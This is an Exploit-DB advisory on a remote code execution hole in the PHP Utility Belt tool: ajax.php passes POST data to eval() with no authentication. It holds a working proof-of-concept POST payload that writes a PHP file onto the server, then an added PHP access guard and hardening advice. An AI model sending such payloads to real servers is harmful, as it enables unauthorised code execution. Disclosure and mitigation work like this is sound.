ID : EDB-ID:38901
Type : exploitdb
Reporter : WICS
Modified : 2015-12-08T00:00:00
Description
PHP Utility Belt - Remote Code Execution. Webapps exploit for php platform
Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author : WICS
Date : 8/12/2015
Software Link : https://github.com/mboynes/php-utility-belt
Overview:
PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
ajax.php is accessible without any authentication.
Vulnerable code (lines 12 to 15):
if ( isset( $_POST['code'] ) ) {
    if ( false === eval( $_POST['code'] ) )
        echo 'PHP Error encountered, execution halted';
}
POC
Access the URL:
http://127.0.0.1/php-utility-belt/ajax.php
In the POST data, enter:
code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');
The above code will generate an info.php file, which will display the PHP info.
The shell link will be:
http://127.0.0.1/php-utility-belt/info.php
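A guard that could run ahead of the eval() block quoted under "Vulnerable code", so the endpoint is no longer reachable without authentication. This is an added example, not part of the original advisory or the project's code; the function name utility_belt_guard, the POST field "token" and the environment variable UTILITY_BELT_TOKEN are assumptions.

```php
<?php
// Added example: access guard placed before the eval() block in ajax.php.
// utility_belt_guard(), the "token" field and UTILITY_BELT_TOKEN are
// hypothetical names chosen for this sketch, not part of the project.

/**
 * Decide whether a request may reach the eval() endpoint.
 * Returns 200 to proceed, otherwise the HTTP status code to send back.
 */
function utility_belt_guard(array $server, array $post, string $expectedToken): int
{
    // 1. Loopback only. Behind a reverse proxy REMOTE_ADDR is the proxy's
    //    address, so this check alone is not sufficient in that setup.
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, ['127.0.0.1', '::1'], true)) {
        return 403;
    }
    // 2. The endpoint only ever needs POST.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 405;
    }
    // 3. Fail closed when no secret has been configured.
    if ($expectedToken === '') {
        return 503;
    }
    // 4. Per-install secret, compared in constant time. This also rejects
    //    cross-site form posts sent by a browser on the same machine,
    //    which arrive from loopback and would pass check 1.
    $supplied = $post['token'] ?? '';
    if (!is_string($supplied) || !hash_equals($expectedToken, $supplied)) {
        return 401;
    }
    return 200;
}

// Enforce the guard when served over HTTP; skipped under the CLI so the
// function can be exercised from a test script.
if (PHP_SAPI !== 'cli') {
    // getenv() returns false when the variable is unset; the cast turns
    // that into '' and check 3 refuses the request.
    $status = utility_belt_guard($_SERVER, $_POST, (string) getenv('UTILITY_BELT_TOKEN'));
    if ($status !== 200) {
        http_response_code($status);
        exit('Request refused');
    }
}
```

The guard narrows who can reach eval(); it does not make evaluating request data safe, so the directory should still be kept off any publicly reachable web root.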